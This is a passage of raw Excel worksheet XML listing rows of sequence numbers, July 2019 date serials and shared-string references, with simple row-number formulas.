        <f t="shared" si="188"/>
        <v>12063</v>
      </c>
      <c r="B12064">
        <v>2063</v>
      </c>
      <c r="C12064" t="s">
        <v>19637</v>
      </c>
      <c r="D12064" s="1">
        <v>43669</v>
      </c>
      <c r="E12064" t="s">
        <v>19695</v>
      </c>
      <c r="F12064" t="s">
        <v>9975</v>
      </c>
      <c r="G12064" t="s">
        <v>22196</v>
      </c>
    </row>
    <row r="12065" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12065">
        <f t="shared" si="188"/>
        <v>12064</v>
      </c>
      <c r="B12065">
        <v>2064</v>
      </c>
      <c r="C12065" t="s">
        <v>19637</v>
      </c>
      <c r="D12065" s="1">
        <v>43669</v>
      </c>
      <c r="E12065" t="s">
        <v>22197</v>
      </c>
      <c r="F12065" t="s">
        <v>10526</v>
      </c>
      <c r="G12065" t="s">
        <v>22198</v>
      </c>
    </row>
    <row r="12066" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12066">
        <f t="shared" si="188"/>
        <v>12065</v>
      </c>
      <c r="B12066">
        <v>2065</v>
      </c>
      <c r="C12066" t="s">
        <v>19637</v>
      </c>
      <c r="D12066" s="1">
        <v>43669</v>
      </c>
      <c r="E12066" t="s">
        <v>21322</v>
      </c>
      <c r="F12066" t="s">
        <v>10021</v>
      </c>
      <c r="G12066" t="s">
        <v>22199</v>
      </c>
    </row>
    <row r="12067" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12067">
        <f t="shared" si="188"/>
        <v>12066</v>
      </c>
      <c r="B12067">
        <v>2066</v>
      </c>
      <c r="C12067" t="s">
        <v>19637</v>
      </c>
      <c r="D12067" s="1">
        <v>43673</v>
      </c>
      <c r="E12067" t="s">
        <v>19640</v>
      </c>
      <c r="F12067" t="s">
        <v>9975</v>
      </c>
      <c r="G12067" t="s">
        <v>22200</v>
      </c>
    </row>
    <row r="12068" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12068">
        <f t="shared" si="188"/>
        <v>12067</v>
      </c>
      <c r="B12068">
        <v>2067</v>
      </c>
      <c r="C12068" t="s">
        <v>19637</v>
      </c>
      <c r="D12068" s="1">
        <v>43669</v>
      </c>
      <c r="E12068" t="s">
        <v>22201</v>
      </c>
      <c r="F12068" t="s">
        <v>10021</v>
      </c>
      <c r="G12068" t="s">
        <v>22202</v>
      </c>
    </row>
    <row r="12069" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12069">
        <f t="shared" si="188"/>
        <v>12068</v>
      </c>
      <c r="B12069">
        <v>2068</v>
      </c>
      <c r="C12069" t="s">
        <v>19637</v>
      </c>
      <c r="D12069" s="1">
        <v>43675</v>
      </c>
      <c r="E12069" t="s">
        <v>19640</v>
      </c>
      <c r="F12069" t="s">
        <v>9975</v>
      </c>
      <c r="G12069" t="s">
        <v>22203</v>
      </c>
    </row>
    <row r="12070" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12070">
        <f t="shared" si="188"/>
        <v>12069</v>
      </c>
      <c r="B12070">
        <v>2069</v>
      </c>
      <c r="C12070" t="s">
        <v>19637</v>
      </c>
      <c r="D12070" s="1">
        <v>43670</v>
      </c>
      <c r="E12070" t="s">
        <v>19653</v>
      </c>
      <c r="F12070" t="s">
        <v>9975</v>
      </c>
      <c r="G12070" t="s">
        <v>22204</v>
      </c>
    </row>
    <row r="12071" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12071">
        <f t="shared" si="188"/>
        <v>12070</v>
      </c>
      <c r="B12071">
        <v>2070</v>
      </c>
      <c r="C12071" t="s">
        <v>19637</v>
      </c>
      <c r="D12071" s="1">
        <v>43672</v>
      </c>
      <c r="F12071" t="s">
        <v>10526</v>
      </c>
      <c r="G12071" t="s">
        <v>22205</v>
      </c>
    </row>
    <row r="12072" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12072">
        <f t="shared" si="188"/>
        <v>12071</v>
      </c>
      <c r="B12072">
        <v>2071</v>
      </c>
      <c r="C12072" t="s">
        <v>19637</v>
      </c>
      <c r="D12072" s="1">
        <v>43674</v>
      </c>
      <c r="E12072" t="s">
        <v>22206</v>
      </c>
      <c r="F12072" t="s">
        <v>9978</v>
      </c>
      <c r="G12072" t="s">
        <v>22207</v>
      </c>
    </row>
    <row r="12073" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12073">
        <f t="shared" si="188"/>
        <v>12072</v>
      </c>
      <c r="B12073">
        <v>2072</v>
      </c>
      <c r="C12073" t="s">
        <v>19637</v>
      </c>
      <c r="D12073" s="1">
        <v>43668</v>
      </c>
      <c r="E12073" t="s">
        <v>19750</v>
      </c>
      <c r="F12073" t="s">
        <v>9978</v>
      </c>
      <c r="G12073" t="s">
        <v>22208</v>
      </c>
    </row>
    <row r="12074" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12074">
        <f t="shared" si="188"/>
        <v>12073</v>
      </c>
      <c r="B12074">
        <v>2073</v>
      </c>
      <c r="C12074" t="s">
        <v>19637</v>
      </c>
      <c r="D12074" s="1">
        <v>43677</v>
      </c>
      <c r="E12074" t="s">
        <v>19640</v>
      </c>
      <c r="F12074" t="s">
        <v>10526</v>
      </c>
      <c r="G12074" t="s">
        <v>22209</v>
      </c>
    </row>
    <row r="12075" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12075">
        <f t="shared" si="188"/>
        <v>12074</v>
      </c>
      <c r="B12075">
        <v>2074</v>
      </c>
      <c r="C12075" t="s">
        <v>19637</v>
      </c>
      <c r="D12075" s="1">
        <v>43668</v>
      </c>
      <c r="E12075" t="s">
        <v>22210</v>
      </c>
      <c r="F12075" t="s">
        <v>9978</v>
      </c>
      <c r="G12075" t="s">
        <v>22211</v>
      </c>
    </row>
    <row r="12076" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12076">
        <f t="shared" si="188"/>
        <v>12075</v>
      </c>
      <c r="B12076">
        <v>2075</v>
      </c>
      <c r="C12076" t="s">
        <v>19637</v>
      </c>
      <c r="D12076" s="1">
        <v>43674</v>
      </c>
      <c r="E12076" t="s">
        <v>20288</v>
      </c>
      <c r="F12076" t="s">
        <v>10021</v>
      </c>
      <c r="G12076" t="s">
        <v>22212</v>
      </c>
    </row>
    <row r="12077" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12077">
        <f t="shared" si="188"/>
        <v>12076</v>
      </c>
      <c r="B12077">
        <v>2076</v>
      </c>
      <c r="C12077" t="s">
        <v>19637</v>
      </c>
      <c r="D12077" s="1">
        <v>43674</v>
      </c>
      <c r="F12077" t="s">
        <v>10021</v>
      </c>
      <c r="G12077" t="s">
        <v>22213</v>
      </c>
    </row>
    <row r="12078" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12078">
        <f t="shared" si="188"/>
        <v>12077</v>
      </c>
      <c r="B12078">
        <v>2077</v>
      </c>
      <c r="C12078" t="s">
        <v>19637</v>
      </c>
      <c r="D12078" s="1">
        <v>43670</v>
      </c>
      <c r="E12078" t="s">
        <v>21566</v>
      </c>
      <c r="F12078" t="s">
        <v>10526</v>
      </c>
      <c r="G12078" t="s">
        <v>22214</v>
      </c>
    </row>
    <row r="12079" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12079">
        <f t="shared" si="188"/>
        <v>12078</v>
      </c>
      <c r="B12079">
        <v>2078</v>
      </c>
      <c r="C12079" t="s">
        <v>19637</v>
      </c>
      <c r="D12079" s="1">
        <v>43677</v>
      </c>
      <c r="E12079" t="s">
        <v>20154</v>
      </c>
      <c r="F12079" t="s">
        <v>10526</v>
      </c>
      <c r="G12079" t="s">
        <v>22215</v>
      </c>
    </row>
    <row r="12080" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12080">
        <f t="shared" si="188"/>
        <v>12079</v>
      </c>
      <c r="B12080">
        <v>2079</v>
      </c>
      <c r="C12080" t="s">
        <v>19637</v>
      </c>
      <c r="D12080" s="1">
        <v>43677</v>
      </c>
      <c r="F12080" t="s">
        <v>10526</v>
      </c>
      <c r="G12080" t="s">
        <v>22216</v>
      </c>
    </row>
    <row r="12081" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12081">
        <f t="shared" si="188"/>
        <v>12080</v>
      </c>
      <c r="B12081">
        <v>2080</v>
      </c>
      <c r="C12081" t="s">
        <v>19637</v>
      </c>
      <c r="D12081" s="1">
        <v>43677</v>
      </c>
      <c r="E12081" t="s">
        <v>19672</v>
      </c>
      <c r="F12081" t="s">
        <v>10021</v>
      </c>
      <c r="G12081" t="s">
        <v>22217</v>
      </c>
    </row>
    <row r="12082" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12082">
        <f t="shared" si="188"/>
        <v>12081</v>
      </c>
      <c r="B12082">
        <v>2081</v>
      </c>
      <c r="C12082" t="s">
        <v>19637</v>
      </c>
      <c r="D12082" s="1">
        <v>43673</v>
      </c>
      <c r="E12082" t="s">
        <v>19873</v>
      </c>
      <c r="F12082" t="s">
        <v>10526</v>
      </c>
      <c r="G12082" t="s">
        <v>22218</v>
      </c>
    </row>
    <row r="12083" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12083">
        <f t="shared" si="188"/>
        <v>12082</v>
      </c>
      <c r="B12083">
        <v>2082</v>
      </c>
      <c r="C12083" t="s">
        <v>19637</v>
      </c>
      <c r="D12083" s="1">
        <v>43675</v>
      </c>
      <c r="F12083" t="s">
        <v>10526</v>
      </c>
      <c r="G12083" t="s">
        <v>22219</v>
      </c>
    </row>
    <row r="12084" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12084">
        <f t="shared" si="188"/>
        <v>12083</v>
      </c>
      <c r="B12084">
        <v>2083</v>
      </c>
      <c r="C12084" t="s">
        <v>19637</v>
      </c>
      <c r="D12084" s="1">
        <v>43671</v>
      </c>
      <c r="E12084" t="s">
        <v>21544</v>
      </c>
      <c r="F12084" t="s">
        <v>10526</v>
      </c>
      <c r="G12084" t="s">
        <v>22220</v>
      </c>
    </row>
    <row r="12085" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12085">
        <f t="shared" si="188"/>
        <v>12084</v>
      </c>
      <c r="B12085">
        <v>2084</v>
      </c>
      <c r="C12085" t="s">
        <v>19637</v>
      </c>
      <c r="D12085" s="1">
        <v>43675</v>
      </c>
      <c r="E12085" t="s">
        <v>19687</v>
      </c>
      <c r="F12085" t="s">
        <v>10021</v>
      </c>
      <c r="G12085" t="s">
        <v>22221</v>
      </c>
    </row>
    <row r="12086" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12086">
        <f t="shared" si="188"/>
        <v>12085</v>
      </c>
      <c r="B12086">
        <v>2085</v>
      </c>
      <c r="C12086" t="s">
        <v>19637</v>
      </c>
      <c r="D12086" s="1">
        <v>43669</v>
      </c>
      <c r="E12086" t="s">
        <v>22222</v>
      </c>
      <c r="F12086" t="s">
        <v>9978</v>
      </c>
      <c r="G12086" t="s">
        <v>22223</v>
      </c>
    </row>
    <row r="12087" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12087">
        <f t="shared" si="188"/>
        <v>12086</v>
      </c>
      <c r="B12087">
        <v>2086</v>
      </c>
      <c r="C12087" t="s">
        <v>19637</v>
      </c>
      <c r="D12087" s="1">
        <v>43673</v>
      </c>
      <c r="E12087" t="s">
        <v>22224</v>
      </c>
      <c r="F12087" t="s">
        <v>10526</v>
      </c>
      <c r="G12087" t="s">
        <v>22225</v>
      </c>
    </row>
    <row r="12088" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12088">
        <f t="shared" si="188"/>
        <v>12087</v>
      </c>
      <c r="B12088">
        <v>2087</v>
      </c>
      <c r="C12088" t="s">
        <v>19637</v>
      </c>
      <c r="D12088" s="1">
        <v>43676</v>
      </c>
      <c r="E12088" t="s">
        <v>19640</v>
      </c>
      <c r="F12088" t="s">
        <v>9975</v>
      </c>
      <c r="G12088" t="s">
        <v>22226</v>
      </c>
    </row>
    <row r="12089" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12089">
        <f t="shared" si="188"/>
        <v>12088</v>
      </c>
      <c r="B12089">
        <v>2088</v>
      </c>
      <c r="C12089" t="s">
        <v>19637</v>
      </c>
      <c r="D12089" s="1">
        <v>43676</v>
      </c>
      <c r="E12089" t="s">
        <v>20436</v>
      </c>
      <c r="F12089" t="s">
        <v>10526</v>
      </c>
      <c r="G12089" t="s">
        <v>22227</v>
      </c>
    </row>
    <row r="12090" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12090">
        <f t="shared" si="188"/>
        <v>12089</v>
      </c>
      <c r="B12090">
        <v>2089</v>
      </c>
      <c r="C12090" t="s">
        <v>19637</v>
      </c>
      <c r="D12090" s="1">
        <v>43671</v>
      </c>
      <c r="F12090" t="s">
        <v>10526</v>
      </c>
      <c r="G12090" t="s">
        <v>22228</v>
      </c>
    </row>
    <row r="12091" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12091">
        <f t="shared" si="188"/>
        <v>12090</v>
      </c>
      <c r="B12091">
        <v>2090</v>
      </c>
      <c r="C12091" t="s">
        <v>19637</v>
      </c>
      <c r="D12091" s="1">
        <v>43668</v>
      </c>
      <c r="E12091" t="s">
        <v>19640</v>
      </c>
      <c r="F12091" t="s">
        <v>9978</v>
      </c>
      <c r="G12091" t="s">
        <v>22229</v>
      </c>
    </row>
    <row r="12092" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12092">
        <f t="shared" si="188"/>
        <v>12091</v>
      </c>
      <c r="B12092">
        <v>2091</v>
      </c>
      <c r="C12092" t="s">
        <v>19637</v>
      </c>
      <c r="D12092" s="1">
        <v>43672</v>
      </c>
      <c r="E12092" t="s">
        <v>19640</v>
      </c>
      <c r="F12092" t="s">
        <v>9975</v>
      </c>
      <c r="G12092" t="s">
        <v>22230</v>
      </c>
    </row>
    <row r="12093" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12093">
        <f t="shared" si="188"/>
        <v>12092</v>
      </c>
      <c r="B12093">
        <v>2092</v>
      </c>
      <c r="C12093" t="s">
        <v>19637</v>
      </c>
      <c r="D12093" s="1">
        <v>43675</v>
      </c>
      <c r="F12093" t="s">
        <v>10526</v>
      </c>
      <c r="G12093" t="s">
        <v>22231</v>
      </c>
    </row>
    <row r="12094" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12094">
        <f t="shared" si="188"/>
        <v>12093</v>
      </c>
      <c r="B12094">
        <v>2093</v>
      </c>
      <c r="C12094" t="s">
        <v>19637</v>
      </c>
      <c r="D12094" s="1">
        <v>43676</v>
      </c>
      <c r="E12094" t="s">
        <v>19643</v>
      </c>
      <c r="F12094" t="s">
        <v>10021</v>
      </c>
      <c r="G12094" t="s">
        <v>22232</v>
      </c>
    </row>
    <row r="12095" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12095">
        <f t="shared" si="188"/>
        <v>12094</v>
      </c>
      <c r="B12095">
        <v>2094</v>
      </c>
      <c r="C12095" t="s">
        <v>19637</v>
      </c>
      <c r="D12095" s="1">
        <v>43674</v>
      </c>
      <c r="F12095" t="s">
        <v>10021</v>
      </c>
      <c r="G12095" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="12096" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12096">
        <f t="shared" si="188"/>
        <v>12095</v>
      </c>
      <c r="B12096">
        <v>2095</v>
      </c>
      <c r="C12096" t="s">
        <v>19637</v>
      </c>
      <c r="D12096" s="1">
        <v>43668</v>
      </c>
      <c r="E12096" t="s">
        <v>19638</v>
      </c>
      <c r="F12096" t="s">
        <v>10021</v>
      </c>
      <c r="G12096" t="s">
        <v>22233</v>
      </c>
    </row>
    <row r="12097" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12097">
        <f t="shared" si="188"/>
        <v>12096</v>
      </c>
      <c r="B12097">
        <v>2096</v>
      </c>
      <c r="C12097" t="s">
        <v>19637</v>
      </c>
      <c r="D12097" s="1">
        <v>43668</v>
      </c>
      <c r="F12097" t="s">
        <v>10526</v>
      </c>
      <c r="G12097" t="s">
        <v>22234</v>
      </c>
    </row>
    <row r="12098" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12098">
        <f t="shared" si="188"/>
        <v>12097</v>
      </c>
      <c r="B12098">
        <v>2097</v>
      </c>
      <c r="C12098" t="s">
        <v>19637</v>
      </c>
      <c r="D12098" s="1">
        <v>43674</v>
      </c>
      <c r="F12098" t="s">
        <v>9975</v>
      </c>
      <c r="G12098" t="s">
        <v>22235</v>
      </c>
    </row>
    <row r="12099" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12099">
        <f t="shared" ref="A12099:A12162" si="189">+ROW(A12098)</f>
        <v>12098</v>
      </c>
      <c r="B12099">
        <v>2098</v>
      </c>
      <c r="C12099" t="s">
        <v>19637</v>
      </c>
      <c r="D12099" s="1">
        <v>43669</v>
      </c>
      <c r="F12099" t="s">
        <v>9975</v>
      </c>
      <c r="G12099" t="s">
        <v>22236</v>
      </c>
    </row>
    <row r="12100" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12100">
        <f t="shared" si="189"/>
        <v>12099</v>
      </c>
      <c r="B12100">
        <v>2099</v>
      </c>
      <c r="C12100" t="s">
        <v>19637</v>
      </c>
      <c r="D12100" s="1">
        <v>43673</v>
      </c>
      <c r="E12100" t="s">
        <v>19640</v>
      </c>
      <c r="F12100" t="s">
        <v>9975</v>
      </c>
      <c r="G12100" t="s">
        <v>22237</v>
      </c>
    </row>
    <row r="12101" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12101">
        <f t="shared" si="189"/>
        <v>12100</v>
      </c>
      <c r="B12101">
        <v>2100</v>
      </c>
      <c r="C12101" t="s">
        <v>19637</v>
      </c>
      <c r="D12101" s="1">
        <v>43670</v>
      </c>
      <c r="E12101" t="s">
        <v>19668</v>
      </c>
      <c r="F12101" t="s">
        <v>9978</v>
      </c>
      <c r="G12101" t="s">
        <v>22238</v>
      </c>
    </row>
    <row r="12102" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12102">
        <f t="shared" si="189"/>
        <v>12101</v>
      </c>
      <c r="B12102">
        <v>2101</v>
      </c>
      <c r="C12102" t="s">
        <v>19637</v>
      </c>
      <c r="D12102" s="1">
        <v>43672</v>
      </c>
      <c r="E12102" t="s">
        <v>20532</v>
      </c>
      <c r="F12102" t="s">
        <v>10021</v>
      </c>
      <c r="G12102" t="s">
        <v>22239</v>
      </c>
    </row>
    <row r="12103" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12103">
        <f t="shared" si="189"/>
        <v>12102</v>
      </c>
      <c r="B12103">
        <v>2102</v>
      </c>
      <c r="C12103" t="s">
        <v>19637</v>
      </c>
      <c r="D12103" s="1">
        <v>43676</v>
      </c>
      <c r="E12103" t="s">
        <v>20024</v>
      </c>
      <c r="F12103" t="s">
        <v>10526</v>
      </c>
      <c r="G12103" t="s">
        <v>22240</v>
      </c>
    </row>
    <row r="12104" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12104">
        <f t="shared" si="189"/>
        <v>12103</v>
      </c>
      <c r="B12104">
        <v>2103</v>
      </c>
      <c r="C12104" t="s">
        <v>19637</v>
      </c>
      <c r="D12104" s="1">
        <v>43668</v>
      </c>
      <c r="F12104" t="s">
        <v>10526</v>
      </c>
      <c r="G12104" t="s">
        <v>22241</v>
      </c>
    </row>
    <row r="12105" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12105">
        <f t="shared" si="189"/>
        <v>12104</v>
      </c>
      <c r="B12105">
        <v>2104</v>
      </c>
      <c r="C12105" t="s">
        <v>19637</v>
      </c>
      <c r="D12105" s="1">
        <v>43668</v>
      </c>
      <c r="E12105" t="s">
        <v>19640</v>
      </c>
      <c r="F12105" t="s">
        <v>9975</v>
      </c>
      <c r="G12105" t="s">
        <v>22242</v>
      </c>
    </row>
    <row r="12106" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12106">
        <f t="shared" si="189"/>
        <v>12105</v>
      </c>
      <c r="B12106">
        <v>2105</v>
      </c>
      <c r="C12106" t="s">
        <v>19637</v>
      </c>
      <c r="D12106" s="1">
        <v>43669</v>
      </c>
      <c r="E12106" t="s">
        <v>22243</v>
      </c>
      <c r="F12106" t="s">
        <v>9975</v>
      </c>
      <c r="G12106" t="s">
        <v>22244</v>
      </c>
    </row>
    <row r="12107" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12107">
        <f t="shared" si="189"/>
        <v>12106</v>
      </c>
      <c r="B12107">
        <v>2106</v>
      </c>
      <c r="C12107" t="s">
        <v>19637</v>
      </c>
      <c r="D12107" s="1">
        <v>43670</v>
      </c>
      <c r="E12107" t="s">
        <v>19640</v>
      </c>
      <c r="F12107" t="s">
        <v>9975</v>
      </c>
      <c r="G12107" t="s">
        <v>22245</v>
      </c>
    </row>
    <row r="12108" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12108">
        <f t="shared" si="189"/>
        <v>12107</v>
      </c>
      <c r="B12108">
        <v>2107</v>
      </c>
      <c r="C12108" t="s">
        <v>19637</v>
      </c>
      <c r="D12108" s="1">
        <v>43674</v>
      </c>
      <c r="E12108" t="s">
        <v>22246</v>
      </c>
      <c r="F12108" t="s">
        <v>10526</v>
      </c>
      <c r="G12108" t="s">
        <v>22247</v>
      </c>
    </row>
    <row r="12109" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12109">
        <f t="shared" si="189"/>
        <v>12108</v>
      </c>
      <c r="B12109">
        <v>2108</v>
      </c>
      <c r="C12109" t="s">
        <v>19637</v>
      </c>
      <c r="D12109" s="1">
        <v>43672</v>
      </c>
      <c r="E12109" t="s">
        <v>21258</v>
      </c>
      <c r="F12109" t="s">
        <v>10021</v>
      </c>
      <c r="G12109" t="s">
        <v>22248</v>
      </c>
    </row>
    <row r="12110" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12110">
        <f t="shared" si="189"/>
        <v>12109</v>
      </c>
      <c r="B12110">
        <v>2109</v>
      </c>
      <c r="C12110" t="s">
        <v>19637</v>
      </c>
      <c r="D12110" s="1">
        <v>43671</v>
      </c>
      <c r="E12110" t="s">
        <v>19695</v>
      </c>
      <c r="F12110" t="s">
        <v>9975</v>
      </c>
      <c r="G12110" t="s">
        <v>22249</v>
      </c>
    </row>
    <row r="12111" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12111">
        <f t="shared" si="189"/>
        <v>12110</v>
      </c>
      <c r="B12111">
        <v>2110</v>
      </c>
      <c r="C12111" t="s">
        <v>19637</v>
      </c>
      <c r="D12111" s="1">
        <v>43676</v>
      </c>
      <c r="E12111" t="s">
        <v>19643</v>
      </c>
      <c r="F12111" t="s">
        <v>10021</v>
      </c>
      <c r="G12111" t="s">
        <v>22250</v>
      </c>
    </row>
    <row r="12112" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12112">
        <f t="shared" si="189"/>
        <v>12111</v>
      </c>
      <c r="B12112">
        <v>2111</v>
      </c>
      <c r="C12112" t="s">
        <v>19637</v>
      </c>
      <c r="D12112" s="1">
        <v>43676</v>
      </c>
      <c r="E12112" t="s">
        <v>21822</v>
      </c>
      <c r="F12112" t="s">
        <v>9978</v>
      </c>
      <c r="G12112" t="s">
        <v>22251</v>
      </c>
    </row>
    <row r="12113" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12113">
        <f t="shared" si="189"/>
        <v>12112</v>
      </c>
      <c r="B12113">
        <v>2112</v>
      </c>
      <c r="C12113" t="s">
        <v>19637</v>
      </c>
      <c r="D12113" s="1">
        <v>43672</v>
      </c>
      <c r="E12113" t="s">
        <v>19650</v>
      </c>
      <c r="F12113" t="s">
        <v>10021</v>
      </c>
      <c r="G12113" t="s">
        <v>22252</v>
      </c>
    </row>
    <row r="12114" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12114">
        <f t="shared" si="189"/>
        <v>12113</v>
      </c>
      <c r="B12114">
        <v>2113</v>
      </c>
      <c r="C12114" t="s">
        <v>19637</v>
      </c>
      <c r="D12114" s="1">
        <v>43673</v>
      </c>
      <c r="E12114" t="s">
        <v>19640</v>
      </c>
      <c r="F12114" t="s">
        <v>9975</v>
      </c>
      <c r="G12114" t="s">
        <v>22253</v>
      </c>
    </row>
    <row r="12115" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12115">
        <f t="shared" si="189"/>
        <v>12114</v>
      </c>
      <c r="B12115">
        <v>2114</v>
      </c>
      <c r="C12115" t="s">
        <v>19637</v>
      </c>
      <c r="D12115" s="1">
        <v>43669</v>
      </c>
      <c r="E12115" t="s">
        <v>19640</v>
      </c>
      <c r="F12115" t="s">
        <v>9975</v>
      </c>
      <c r="G12115" t="s">
        <v>22254</v>
      </c>
    </row>
    <row r="12116" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12116">
        <f t="shared" si="189"/>
        <v>12115</v>
      </c>
      <c r="B12116">
        <v>2115</v>
      </c>
      <c r="C12116" t="s">
        <v>19637</v>
      </c>
      <c r="D12116" s="1">
        <v>43677</v>
      </c>
      <c r="E12116" t="s">
        <v>21287</v>
      </c>
      <c r="F12116" t="s">
        <v>10526</v>
      </c>
      <c r="G12116" t="s">
        <v>22255</v>
      </c>
    </row>
    <row r="12117" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12117">
        <f t="shared" si="189"/>
        <v>12116</v>
      </c>
      <c r="B12117">
        <v>2116</v>
      </c>
      <c r="C12117" t="s">
        <v>19637</v>
      </c>
      <c r="D12117" s="1">
        <v>43670</v>
      </c>
      <c r="E12117" t="s">
        <v>19640</v>
      </c>
      <c r="F12117" t="s">
        <v>9975</v>
      </c>
      <c r="G12117" t="s">
        <v>22256</v>
      </c>
    </row>
    <row r="12118" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12118">
        <f t="shared" si="189"/>
        <v>12117</v>
      </c>
      <c r="B12118">
        <v>2117</v>
      </c>
      <c r="C12118" t="s">
        <v>19637</v>
      </c>
      <c r="D12118" s="1">
        <v>43674</v>
      </c>
      <c r="E12118" t="s">
        <v>19796</v>
      </c>
      <c r="F12118" t="s">
        <v>10021</v>
      </c>
      <c r="G12118" t="s">
        <v>22257</v>
      </c>
    </row>
    <row r="12119" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12119">
        <f t="shared" si="189"/>
        <v>12118</v>
      </c>
      <c r="B12119">
        <v>2118</v>
      </c>
      <c r="C12119" t="s">
        <v>19637</v>
      </c>
      <c r="D12119" s="1">
        <v>43669</v>
      </c>
      <c r="E12119" t="s">
        <v>20293</v>
      </c>
      <c r="F12119" t="s">
        <v>10526</v>
      </c>
      <c r="G12119" t="s">
        <v>22258</v>
      </c>
    </row>
    <row r="12120" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12120">
        <f t="shared" si="189"/>
        <v>12119</v>
      </c>
      <c r="B12120">
        <v>2119</v>
      </c>
      <c r="C12120" t="s">
        <v>19637</v>
      </c>
      <c r="D12120" s="1">
        <v>43673</v>
      </c>
      <c r="E12120" t="s">
        <v>20458</v>
      </c>
      <c r="F12120" t="s">
        <v>9978</v>
      </c>
      <c r="G12120" t="s">
        <v>22259</v>
      </c>
    </row>
    <row r="12121" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12121">
        <f t="shared" si="189"/>
        <v>12120</v>
      </c>
      <c r="B12121">
        <v>2120</v>
      </c>
      <c r="C12121" t="s">
        <v>19637</v>
      </c>
      <c r="D12121" s="1">
        <v>43674</v>
      </c>
      <c r="E12121" t="s">
        <v>22260</v>
      </c>
      <c r="F12121" t="s">
        <v>10526</v>
      </c>
      <c r="G12121" t="s">
        <v>22261</v>
      </c>
    </row>
    <row r="12122" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12122">
        <f t="shared" si="189"/>
        <v>12121</v>
      </c>
      <c r="B12122">
        <v>2121</v>
      </c>
      <c r="C12122" t="s">
        <v>19637</v>
      </c>
      <c r="D12122" s="1">
        <v>43674</v>
      </c>
      <c r="E12122" t="s">
        <v>19705</v>
      </c>
      <c r="F12122" t="s">
        <v>10021</v>
      </c>
      <c r="G12122" t="s">
        <v>22262</v>
      </c>
    </row>
    <row r="12123" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12123">
        <f t="shared" si="189"/>
        <v>12122</v>
      </c>
      <c r="B12123">
        <v>2122</v>
      </c>
      <c r="C12123" t="s">
        <v>19637</v>
      </c>
      <c r="D12123" s="1">
        <v>43673</v>
      </c>
      <c r="E12123" t="s">
        <v>22263</v>
      </c>
      <c r="F12123" t="s">
        <v>10526</v>
      </c>
      <c r="G12123" t="s">
        <v>22264</v>
      </c>
    </row>
    <row r="12124" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12124">
        <f t="shared" si="189"/>
        <v>12123</v>
      </c>
      <c r="B12124">
        <v>2123</v>
      </c>
      <c r="C12124" t="s">
        <v>19637</v>
      </c>
      <c r="D12124" s="1">
        <v>43676</v>
      </c>
      <c r="E12124" t="s">
        <v>22265</v>
      </c>
      <c r="F12124" t="s">
        <v>10526</v>
      </c>
      <c r="G12124" t="s">
        <v>22266</v>
      </c>
    </row>
    <row r="12125" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12125">
        <f t="shared" si="189"/>
        <v>12124</v>
      </c>
      <c r="B12125">
        <v>2124</v>
      </c>
      <c r="C12125" t="s">
        <v>19637</v>
      </c>
      <c r="D12125" s="1">
        <v>43674</v>
      </c>
      <c r="F12125" t="s">
        <v>10526</v>
      </c>
      <c r="G12125" t="s">
        <v>22267</v>
      </c>
    </row>
    <row r="12126" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12126">
        <f t="shared" si="189"/>
        <v>12125</v>
      </c>
      <c r="B12126">
        <v>2125</v>
      </c>
      <c r="C12126" t="s">
